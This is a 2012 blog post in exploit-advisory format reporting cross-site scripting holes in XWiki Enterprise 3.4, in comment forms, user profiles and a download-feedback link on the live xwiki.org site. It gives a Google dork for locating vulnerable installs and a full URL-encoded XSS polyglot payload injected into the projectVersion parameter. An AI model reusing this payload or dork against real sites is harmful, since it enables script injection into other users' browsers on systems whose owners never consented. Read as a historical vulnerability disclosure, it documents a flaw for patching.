Saturday, 4 February 2012

XWiki Cross Site Scripting

# Exploit Title: XWiki Cross Site Scripting
# Date: 4.02.2012
# Author: Sony

# Software Link: http://www.xwiki.org/
# Software Version: XWiki Enterprise 3.4
# Google Dorks: inurl:xwiki/bin/
# Web Browser: Mozilla Firefox

# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/xwiki-cross-site-scripting.html
..................................................................

("Wikimania")

Well, we have XSS in the comment form of blog posts:

http://www.xwiki.org/xwiki/bin/view/Blog/XWikiEnterprise14RC1Released



And yes, in the user profile as well (TWiki, Foswiki...):

http://www.xwiki.org/xwiki/bin/XWiki/SonyStyles

In older versions, cross-site scripting shows up in other places as well.



P.S. I also found XSS in the download link, an interesting place for XSS:

http://www.xwiki.org/xwiki/bin/view/DownloadCode/DownloadFeedback?downloadLink=http://download.forge.objectweb.org/xwiki/xwiki-enterprise-installer-windows-3.4.exe&projectType=Stable&projectVersion=3.4%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&projectID=1


Demo Video: (but with humor, because I like humor...)
